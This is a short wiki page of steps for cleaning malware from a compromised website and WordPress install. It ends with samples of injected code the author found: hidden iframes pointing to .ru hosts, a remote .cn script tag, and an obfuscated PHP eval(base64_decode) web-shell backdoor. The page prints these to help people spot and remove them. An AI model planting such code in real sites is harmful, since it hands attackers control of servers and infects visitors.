Clean

Clean

From ThaiiS Note (Wiki)

Jump to: navigation, search

Clean badware from your www

  1. change hosting password
  2. unplug computer from network
  3. scan your computer with anti virus tool with the most up-to-date signature database
  4. scan again with malware remover
  5. restart computer and check if your anti virus tool still runs normally
  6. make sure your drive (c: d: e:) has no AUTORUN.INF
  7. Right Click on Drive c: d: e: contact menu without #$#%%^&|*()&&^^^ text
  8. backup your www db
    1. mysql
    2. wordpress xml
  9. download all file to computer folder( name + virus)
  10. copy all to new folder (name + novirus)
  11. clear badware file ( http.php, 10956.php, test.pl etc...)
  12. remove badware code or script from all file use search and manual (<iframe .... cn:80> etc...)
  13. clear all file from hosting
  14. upload all file in folder (name + novirus) to hosting
  15. set permission all file & folder to 555
  16. change owner to root or other
  17. submit your site at http://www.google.com/webmasters/tools to check if your site is still infected.
  18. change hosting password again

more

Clean Hacked wordpress installation

badware code was found

  • fm100cmu.com 
<script src='http://b.nt002.cn/E/J.JS'></script>
<div style="display:none">elylsixmbfsoxtnmvloqlszbcfyetrg<iframe width=406 height=232 src="http://bionaft.ru:8080/index.php" ></iframe></div>
<iframe with domain .cn<pre>cn:80
<div style="display:none">elylsixmbfsoxtnmvloqlszbcfyetrg<iframe width=406 height=232 src="http://bionaft.ru:8080/index.php" ></iframe></div>
<iframe src="http://3ca.ru/index.php" width=115 height=177 style="visibility: hidden"></iframe>
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
<div style="display:none">uxrzpatxkxeucweclzibjdiqlyxtgeb<iframe width=702 height=883 src="http://bio-v.ru:8080/index.php" ></iframe></div>
<div style="display:none">wslrtkrzjgdhxksiqtgsrannhbyyfik<iframe width=588 height=292 src="http://samsungicq.ru:8080/index.php" ></iframe></div>
<div style="display:none"><iframe width=772 height=112 src="http://what-is-your-iq.ru:8080/index.php" ></iframe></div>
<iframe src="http://3ca.ru/index.php" width=115 height=177 style="visibility: hidden"></iframe>
<div style="display:none"><iframe width=501 height=161 src="http://offiget.ru:8080/index.php" ></iframe></div>
<iframe src="http://x1i.ru/index.php" width=183 height=115 style="visibility: hidden"></iframe>
Retrieved from "http://www.thaiis.eu/Clean"